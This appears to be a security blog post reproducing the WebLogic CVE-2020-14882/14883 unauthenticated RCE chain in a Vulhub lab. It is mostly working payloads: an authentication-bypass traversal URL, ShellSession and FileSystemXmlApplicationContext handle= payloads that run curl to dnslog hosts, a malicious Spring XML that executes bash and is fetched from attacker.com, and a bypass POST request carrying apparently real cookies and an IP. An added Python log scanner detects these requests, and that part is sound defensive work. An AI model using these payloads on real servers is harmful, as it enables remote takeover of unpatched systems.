0x00 Preface

A quick study of the WebLogic unauthenticated RCE vulnerabilities (CVE-2020-14882/CVE-2020-14883).

0x01 WebLogic Unauthenticated RCE

Environment setup

Using Vulhub: https://vulhub.org/#/environments/weblogic/CVE-2020-14882/

Affected versions

Oracle WebLogic Server 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0.

Vulnerability principle

  • CVE-2020-14883: allows an unauthenticated user to bypass the admin console's authorization check and reach the console backend by combining directory traversal with double URL encoding.
  • CVE-2020-14882: allows any user who has reached the console backend to execute arbitrary commands over HTTP.

Vulnerability reproduction

This is mainly a chained use of the two CVEs: first gain unauthorized access to the console backend, then achieve RCE through a backend interface that can execute commands.

CVE-2020-14883

Normally, if you are not logged in to WebLogic, a request to the console backend is immediately redirected (302) to the /console/login/LoginForm.jsp login page.

However, combining directory traversal with double URL encoding bypasses authentication and gives unauthorized access to the console backend:

The payload for the unauthorized access is:

http://ip:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=

CVE-2020-14882

The previous CVE gives access to the backend, but only as a low-privileged user who cannot deploy applications, so command execution is triggered instead by requesting the following URL; DNSLog is used here for out-of-band confirmation:

http://ip:7001/console/console.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('curl%20http://weblogic.rlk5z3.dnslog.cn');")

The malicious class used in this exploitation is com.tangosol.coherence.mvel2.sh.ShellSession.

Chained exploitation

Chaining the two CVEs together gives unauthenticated RCE:

http://ip:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('curl%20http://weblogic.2qokvr.dnslog.cn');")

Bypass variant

POST /biz/%2e./console/css/%25%32e%25%32e%25%32fconsole.portal HTTP/1.1
Host: a.com
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Cookie: BIGipServerSOL3_Docker_ZB=!ZhZtHJOmr5bPDjl6JVsajan6U8tjmcsXu/RgQvH6FyBrNzbalB857UZ0cOVZRMDvApu0sGpXvBnISqc=; TS01a69607=011223a830f54e1940dbb38950c7e6a279c477815452ea36745aed14040c887138bcb023eb2c41d4ba3cd0ba478b0228afcb3ead628ca92eac2dea5d867b15ba9443d0d8de;
Content-Length: 2044
X-Forwarded-For: 223.104.96.232
Client_IP_ADDR: 223.104.96.232


A universal malicious class

As seen above, the malicious class used for command execution is com.tangosol.coherence.mvel2.sh.ShellSession, which only works on WebLogic 12.2.1 and later, because the class does not exist in version 10.3.6.

So switch to the more general malicious class mentioned in CVE-2019-2725, com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext, which works against all WebLogic versions.

How the FileSystemXmlApplicationContext class works: it fetches an XML file from a remote server and parses it; the XML can declare a bean of class ProcessBuilder with start() as its init method and a malicious command as its constructor argument, which leads to RCE.

First, the malicious XML file must be hosted on the attacker's server, which the WebLogic server must be able to reach:

<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
            <list>
                <value>bash</value>
                <value>-c</value>
                <value><![CDATA[curl http://weblogic.pqczq8.dnslog.cn]]></value>
            </list>
        </constructor-arg>
    </bean>
</beans>

Then, in the same way as before, make the WebLogic server load the malicious XML file:

http://ip:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://attacker.com/rce.xml")
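As an added defensive example (not code from the original post), the following Python scans constructed web-server access-log lines for the two request patterns described in the chained-exploitation section and the universal-class section above: a double-encoded traversal into console.portal (CVE-2020-14883) and a handle= parameter naming either of the two gadget classes (CVE-2020-14882). The log lines, IPs, timestamps and the COMMAND placeholder are constructed; the decoder is repeated until stable so that %252e and the %25%32e form from the bypass variant both normalise to a dot.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

GADGET_CLASSES = (  # classes passed via handle= in the requests shown on this page
    "com.tangosol.coherence.mvel2.sh.ShellSession",
    "com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext",
)
# Constructed access-log lines (combined format); IPs, times and COMMAND are made up.
LOG_LINES = [
    '10.0.0.5 - - [29/Oct/2020:10:00:00 +0000] "GET /console/css/%252e%252e%252f'
    'console.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2'
    '.sh.ShellSession(%22COMMAND%22) HTTP/1.1" 200 512',
    '10.0.0.7 - - [29/Oct/2020:10:00:02 +0000] "POST /biz/%2e./console/css/'
    '%25%32e%25%32e%25%32fconsole.portal HTTP/1.1" 200 100',
]
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
TRAVERSAL_RE = re.compile(r"(^|/)\.\.(/|$)")

def fully_decode(s, max_rounds=5):
    """Percent-decode until stable, so %252e and %25%32e both end up as '.'."""
    for _ in range(max_rounds):
        if (decoded := unquote(s)) == s:
            break
        s = decoded
    return s

def analyze_target(target):
    """Return findings for one request target (path plus optional query string)."""
    findings = []
    parts = urlsplit(fully_decode(target))
    # CVE-2020-14883: a '..' segment inside /console/ that lands on console.portal
    if "/console/" in parts.path and "console.portal" in parts.path \
            and TRAVERSAL_RE.search(parts.path):
        findings.append("CVE-2020-14883 traversal to console.portal")
    # CVE-2020-14882: handle= naming a gadget class (only visible in GET query strings)
    for handle in parse_qs(parts.query, keep_blank_values=True).get("handle", []):
        for cls in GADGET_CLASSES:
            if handle.startswith(cls):
                findings.append("CVE-2020-14882 handle=" + cls)
    return findings

def scan_log(lines):
    """Return (client_ip, findings) for every log line that triggers a rule."""
    hits = []
    for line in lines:
        m = LOG_RE.search(line)
        findings = analyze_target(m.group("target")) if m else []
        if findings:
            hits.append((line.split()[0], findings))
    return hits
```

The POST body of the bypass variant never reaches an access log, so that request is only caught by its path; inspecting handle= in request bodies needs a WAF or reverse proxy that logs them.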

Vulnerability analysis

To be analyzed…

Tools

Reference: https://github.com/GGyao/CVE-2020-14882_ALL

Mitigation

Upgrade WebLogic to a patched version.